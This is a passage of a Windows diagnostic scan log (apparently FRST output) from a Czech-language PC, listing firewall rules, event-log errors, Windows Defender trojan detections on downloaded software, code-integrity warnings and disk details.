FirewallRules: [DNS Server Forward Rule - UDP - 68856003-c685-4c51-840f-9758cecf39c8 - 0] => (Allow) LPort=53
FirewallRules: [{01A62426-B1D7-4724-882A-9AC351096889}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{C2A73B52-07DF-4072-BD5B-3F60806F0B96}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{B792B815-E781-4E53-ABAD-7B7B256DBB8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe
FirewallRules: [{E773251D-03B4-4B55-AE32-E6928819C4FB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe
FirewallRules: [DNS Server Forward Rule - TCP - bbc2df18-4931-49bc-b29a-c291fecb1392 - 0] => (Allow) LPort=53
FirewallRules: [DNS Server Forward Rule - UDP - bbc2df18-4931-49bc-b29a-c291fecb1392 - 0] => (Allow) LPort=53
FirewallRules: [{F6035256-A96A-437F-9A29-E03F9C9B8B5C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{53E44A7B-DD43-49AF-9B44-668628E4D42F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{0A977731-26C9-46E4-A5B4-F8B2A2AD3885}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{618C7A6D-56E4-4606-81D9-A2E8DA664CAC}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{501E6677-580B-4D7C-BF92-908DA76C1D27}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
FirewallRules: [{9BD1FECD-8F49-4C08-9EB3-5A643C6B7538}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9A2B8971-3189-4E62-91E0-4B405E6652A0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C218F8B5-E452-4505-B39C-E016080BEA51}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{015CDE3C-96A8-4BDF-ABE6-4006948F8C2F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{499F4936-A2DE-4DA0-86CB-C8C23C45D4A4}] => (Allow) C:\Program Files (x86)\FormatFactory\FormatFactory.exe
FirewallRules: [{2688D78B-6C19-4494-A1AD-2C9A8D9302A9}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe
FirewallRules: [{E886E23F-1CFE-443C-8A43-E30C22D71523}] => (Allow) C:\Program Files (x86)\FormatFactory\FormatFactory.exe
FirewallRules: [{30BA75DE-33C1-483C-A276-8265F4086C14}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe
FirewallRules: [{6158E4AA-5314-46DA-8C73-1E23EC90F3C6}] => (Allow) C:\Program Files (x86)\FormatFactory\FormatFactory.exe
FirewallRules: [{84E85EBF-AB99-4ED3-944A-022AE92B5E4E}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe
FirewallRules: [{FD3F0858-8AC4-40E4-9629-1BEF0FAAF122}] => (Allow) C:\Program Files (x86)\FormatFactory\FFModules\Package\PTInstOnline.exe
FirewallRules: [{D01DCDA8-8597-40F8-A1D0-4E79D7E49AF7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\War Robots\WarRobots.exe
FirewallRules: [{6498DED0-E49D-4573-ADEE-B50574AC62DE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\War Robots\WarRobots.exe
FirewallRules: [{128F9E5E-25E1-4086-B196-4DA6C06F5384}] => (Allow) C:\Program Files (x86)\DroidCam\DroidCamApp.exe
FirewallRules: [{CCCAC37E-94E7-4EE5-B292-1EE2BE1563E3}] => (Allow) C:\Program Files (x86)\DroidCam\DroidCamApp.exe
FirewallRules: [{004D02A7-18A0-4322-BB71-3AF3ECB956DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{7E71EB4D-24F6-4A4C-ABDE-7749EC8026BE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{CF7F6AD4-62DE-4D89-A31B-CCFF45E41804}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Thief\Binaries\Win64\Shipping-ThiefGame.exe
FirewallRules: [{1976CC87-A751-491B-A35D-C5C86651D6D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Thief\Binaries\Win64\Shipping-ThiefGame.exe
FirewallRules: [{90F76697-3F1F-4BA0-B201-3AB2FEF39514}] => (Allow) E:\Hry\steamapps\common\Max Payne 3\Max Payne 3\MaxPayne3.exe
FirewallRules: [{12D48D32-DAD0-4D3C-BBAF-BC76C089BDE8}] => (Allow) E:\Hry\steamapps\common\Max Payne 3\Max Payne 3\MaxPayne3.exe
FirewallRules: [{9E86081D-7942-4A6F-ABD5-6D742F121B3B}] => (Allow) E:\Hry\steamapps\common\SleepingDogs\HKShip.exe
FirewallRules: [{575F8ACA-19FB-4286-B746-1BF6205E3BB4}] => (Allow) E:\Hry\steamapps\common\SleepingDogs\HKShip.exe
FirewallRules: [{AF423A76-96B9-468A-BC6A-94CFC114CD95}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForest.exe
FirewallRules: [{259DF12D-7655-41AE-A47B-C2351B7A0473}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForest.exe
FirewallRules: [{CEC7BC25-2E76-4B6C-A8D5-D047949BFA60}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForestVR.exe
FirewallRules: [{EC900147-C4C8-4C5C-BB38-96FDFB34F7BC}] => (Allow) E:\Hry\steamapps\common\The Forest\TheForestVR.exe
FirewallRules: [{D67A734E-6464-4606-9603-5A0BB977F899}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{813F87FE-DBF1-45D2-9E65-96F29580518E}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{AE687531-84DF-4848-A306-4341BCD8FB39}] => (Allow) C:\Program Files\Opera\54.0.2952.64\opera.exe
FirewallRules: [DNS Server Forward Rule - TCP - f2bbcd59-5643-4910-a61e-d3e36d72daa2 - 0] => (Allow) LPort=53
FirewallRules: [DNS Server Forward Rule - UDP - f2bbcd59-5643-4910-a61e-d3e36d72daa2 - 0] => (Allow) LPort=53
FirewallRules: [{41E26A1D-3F84-4B04-AE33-FC41AC687221}] => (Allow) C:\Program Files\Opera\54.0.2952.71\opera.exe
FirewallRules: [{4683F2F4-4F17-4D47-B52C-E4C7B153E294}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{6E962D5A-DF41-4685-9D3D-3BCCD5024E7E}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\FarCry5.exe
FirewallRules: [{12C47B9E-700C-40D4-BA37-DE9B3F763531}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\ArcadeEditor64.exe
FirewallRules: [{083FBA20-D9B6-4983-8030-358E844AA1EC}] => (Allow) E:\Hry\steamapps\common\FarCry5\bin\ArcadeEditor64.exe
FirewallRules: [{63C7684D-1DE7-498F-B226-D6F9AAE1AA15}] => (Allow) C:\Users\cheat\AppData\Local\Temp\spoolsv\msvcr.exe
FirewallRules: [{408E21AC-ADA9-453C-BA7C-4E90B383AC2A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{1281EC7B-357B-4DBD-91A9-A4F8AC172F5C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe
FirewallRules: [{DA76BAF2-98D5-4765-9BD2-AABEF1594881}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe
FirewallRules: [{4476D818-95E9-46D8-9C53-7F794012A80A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe

==================== Restore Points =========================

12-08-2018 18:44:27 Naplánovaný kontrolní bod
21-08-2018 21:00:26 Installed 4K Video Downloader 4.4

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (08/24/2018 09:33:18 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program explorer.exe verze 10.0.17134.165 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 1f34

Čas spuštění: 01d43bdd792b17a0

Čas ukončení: 0

Cesta k aplikaci: C:\Windows\explorer.exe

ID hlášení: 5d42582a-199d-4810-8965-cbf5c4c48003

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (08/23/2018 11:51:24 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program MicrosoftEdgeCP.exe verze 11.0.17134.228 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 3dd0

Čas spuštění: 01d43b2142b2ed32

Čas ukončení: 7

Cesta k aplikaci: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ID hlášení: badbb3bc-3feb-4820-aad7-19cd89586869

Úplný název balíčku s chybou: Microsoft.MicrosoftEdge_42.17134.1.0_neutral__8wekyb3d8bbwe

ID aplikace související s balíčkem s chybou: ContentProcess

Error: (08/23/2018 10:38:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: utorrent.exe, verze: 2.2.1.25534, časové razítko: 0x4e4594ce
Název chybujícího modulu: GDI32.dll, verze: 10.0.17134.1, časové razítko: 0xe8b78880
Kód výjimky: 0xc000041d
Posun chyby: 0x000063a7
ID chybujícího procesu: 0xc08
Čas spuštění chybující aplikace: 0x01d43adbaf4cc91b
Cesta k chybující aplikaci: C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe
Cesta k chybujícímu modulu: C:\Windows\System32\GDI32.dll
ID zprávy: fdc4c724-1693-4558-8e14-aa97a232ff54
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (08/23/2018 09:11:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program WinX_YouTube_Downloader.exe verze 4.2.0.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 396c

Čas spuštění: 01d43b1383ace8e1

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Program Files (x86)\Digiarty\WinX_YouTube_Downloader\WinX_YouTube_Downloader.exe

ID hlášení: c5898523-40b6-43df-b1af-e52e508d586f

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (08/21/2018 08:56:58 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Systém Windows nemůže získat přístup k souboru z jednoho z těchto důvodů:
došlo k problému s připojením k síti, s diskem, na kterém je soubor uložen, nebo
s ovladači ukládání nainstalovanými v tomto počítači; nebo disk chybí.
Systém Windows kvůli této chybě ukončil program Direct Video Downloader.

Program: Direct Video Downloader
Soubor:

Hodnota chyby je uvedena v části Další údaje.
Akce uživatele
1. Otevřete soubor znovu.
Může se jednat o dočasný problém, který se při novém spuštění programu nebude opakovat.
2.
Pokud k souboru stále nelze získat přístup a:
- Nachází se v síti,
měl by správce sítě ověřit, zda nedošlo k problému se sítí a zda lze server kontaktovat.
- Je na vyměnitelném disku (například disketě nebo disku CD-ROM), ověřte, zda je disk správně vložen do počítače.
3. Zkontrolujte a opravte systém souborů pomocí nástroje CHKDSK. Ten lze spustit tak, že kliknete na tlačítko Start a příkaz Spustit, zadáte příkaz CMD a kliknete na tlačítko OK. Do příkazového řádku zadejte příkaz CHKDSK /F a stiskněte klávesu ENTER.
4. Pokud potíže potrvají, obnovte soubor ze záložní kopie.
5. Zjistěte, zda lze otevřít jiné soubory na stejném disku. Pokud ne, může být disk poškozen. Jedná-li se o pevný disk, obraťte se na správce nebo na dodavatele počítačového hardwaru
se žádostí o pomoc.

Další údaje
Hodnota chyby: 00000000
Typ disku: 0

Error: (08/21/2018 08:56:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: dvd212.exe, verze: 2.12.0.0, časové razítko: 0x589e33c8
Název chybujícího modulu: shell32.dll, verze: 10.0.17134.228, časové razítko: 0x02013caa
Kód výjimky: 0xc000001d
Posun chyby: 0x00000000000e8430
ID chybujícího procesu: 0xa44
Čas spuštění chybující aplikace: 0x01d439808f13b5cd
Cesta k chybující aplikaci: C:\Program Files (x86)\Direct Video Downloader\dvd212.exe
Cesta k chybujícímu modulu: C:\Windows\System32\shell32.dll
ID zprávy: 4faeffa8-91b4-4367-bfe7-54ab23061af9
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (08/21/2018 08:56:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: dvd212.exe, verze: 2.12.0.0, časové razítko: 0x589e33c8
Název chybujícího modulu: shell32.dll, verze: 10.0.17134.228, časové razítko: 0x02013caa
Kód výjimky: 0xc0000005
Posun chyby: 0x00000000000931b4
ID chybujícího procesu: 0xa44
Čas spuštění chybující aplikace: 0x01d439808f13b5cd
Cesta k chybující aplikaci: C:\Program Files (x86)\Direct Video Downloader\dvd212.exe
Cesta k chybujícímu modulu: C:\Windows\System32\shell32.dll
ID zprávy: 7de68ca9-e037-40b2-9ee2-dc83d2ec23e0
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (08/21/2018 08:56:46 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: dvd212.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na System.Windows.Forms.UnsafeNativeMethods+Shell32.SHBrowseForFolder(BROWSEINFO)
na System.Windows.Forms.FolderBrowserDialog.RunDialog(IntPtr)
na System.Windows.Forms.CommonDialog.ShowDialog(System.Windows.Forms.IWin32Window)
na  .()
na System.Windows.Forms.Control.OnClick(System.EventArgs)
na System.Windows.Forms.Control.WmMouseUp(System.Windows.Forms.Message ByRef, System.Windows.Forms.MouseButtons, Int32)
na System.Windows.Forms.Control.WndProc(System.Windows.Forms.Message ByRef)
na System.Windows.Forms.NativeWindow.Callback(IntPtr, Int32, IntPtr, IntPtr)
na System.Windows.Forms.UnsafeNativeMethods.DispatchMessageW(MSG ByRef)
na System.Windows.Forms.Application+ComponentManager.System.Windows.Forms.UnsafeNativeMethods.IMsoComponentManager.FPushMessageLoop(IntPtr, Int32, Int32)
na System.Windows.Forms.Application+ThreadContext.RunMessageLoopInner(Int32, System.Windows.Forms.ApplicationContext)
na System.Windows.Forms.Application+ThreadContext.RunMessageLoop(Int32, System.Windows.Forms.ApplicationContext)
na  .()


System errors:
=============
Error: (08/24/2018 09:08:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Spuštění pro serverovou aplikaci COM s identifikátorem CLSID
Windows.SecurityCenter.WscBrokerManager
a APPID
Není k dispozici
uživateli NT AUTHORITY\SYSTEM (SID: S-1-5-18) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:49 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:35 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:14 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:06:08 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:05:50 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
a APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
uživateli NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:05:50 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
a APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
uživateli NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (08/24/2018 09:02:14 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-1JRDM4L)
Description: Nastavení oprávnění specifické pro aplikaci neuděluje oprávnění Místní Aktivace pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-1JRDM4L\cheat (SID: S-1-5-21-1409225181-4065645274-1912239689-1002) z adresy LocalHost (pomocí LRPC) běžící v kontejneru aplikací Není k dispozici – SID (Není k dispozici). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.


Windows Defender:
===================================
Date: 2018-06-17 01:01:52.620
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\seed\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 0.0.0.0
Verze modulu: AM: 1.1.14901.4, NIS: 0.0.0.0

Date: 2018-06-17 01:01:13.606
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\seed\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 1.269.1385.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-17 01:00:57.116
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\seed\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 1.269.1385.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-17 01:00:23.631
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/CryptInject
ID: 2147725859
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_E:\Stahování\NOT COMPLETE\4K Video Downloader\4K Video Downloader.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-1JRDM4L\cheat
Název procesu: C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe
Verze podpisu: AV: 1.269.1385.0, AS: 1.269.1385.0, NIS: 1.269.1385.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-13 14:13:48.740
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: VirTool:Win32/Obfuscator
ID: 2147584956
Závažnost: Vážné
Kategorie: Nástroj
Cesta: file:_E:\Stahování\seed\Crysis.3.Update.v1.3.INTERNAL-RELOADED\Crack\AEyrC.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze podpisu: AV: 1.269.1121.0, AS: 1.269.1121.0, NIS: 1.269.1121.0
Verze modulu: AM: 1.1.14901.4, NIS: 1.1.14901.4

Date: 2018-06-12 12:09:50.000
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o aktualizaci podpisů.
Nová verze podpisu:
Předchozí verze podpisu: 1.269.1068.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\SYSTEM
Aktuální verze modulu:
Předchozí verze modulu: 1.1.14901.4
Kód chyby: 0x80240438
Popis chyby ři zjišťování aktualizací došlo k neočekávaným potížím. Informace o instalaci nebo řešení potíží s aktualizacemi naleznete v nápovědě a podpoře.

Date: 2018-06-10 16:44:09.568
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o načtení podpisů a pokusí se o obnovení sady podpisů, jejichž správnost je potvrzena.
Podpisy, které se měly načíst: Aktuální
Kód chyby: 0x80070002
Popis chyby: Systém nemůže nalézt uvedený soubor.
Verze podpisu: 0.0.0.0;0.0.0.0
Verze modulu: 0.0.0.0

Date: 2018-06-10 14:56:29.589
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o aktualizaci podpisů.
Nová verze podpisu:
Předchozí verze podpisu: 1.269.1000.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\SYSTEM
Aktuální verze modulu:
Předchozí verze modulu: 1.1.14901.4
Kód chyby: 0x80070643
Popis chyby ři instalaci došlo k závažné chybě.

Date: 2018-06-04 22:18:15.589
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo chybu při pokusu o aktualizaci podpisů.
Nová verze podpisu:
Předchozí verze podpisu: 1.269.600.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\SYSTEM
Aktuální verze modulu:
Předchozí verze modulu: 1.1.14901.4
Kód chyby: 0x8024402c
Popis chyby ři zjišťování aktualizací došlo k neočekávaným potížím. Informace o instalaci nebo řešení potíží s aktualizacemi naleznete v nápovědě a podpoře.

CodeIntegrity:
===================================

Date: 2018-08-24 21:25:32.259
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:25:32.258
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:50.483
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:50.481
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:02.848
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:21:02.847
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:13:52.674
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2018-08-24 21:13:52.673
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 29%
Total physical RAM: 16321.84 MB
Available physical RAM: 11556.15 MB
Total Virtual: 18753.84 MB
Available Virtual: 12085.5 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.16 GB) (Free:53.21 GB) NTFS
Drive e: (Stahování) (Fixed) (Total:1863.01 GB) (Free:345.27 GB) NTFS ==>[system with boot components (obtained from drive)]

\\?\Volume{2be4c9f9-1161-42f2-a704-311565b38549}\ (Obnovení) (Fixed) (Total:0.49 GB) (Free:0.1 GB) NTFS
\\?\Volume{6f8d5729-a966-4ecc-b6e9-1c18b55921fd}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 3677D62D)
Partition 1: (Not Active) - (Size=993 KB) - (Type=42)
Partition 2: (Active) - (Size=1863 GB) - (Type=42)
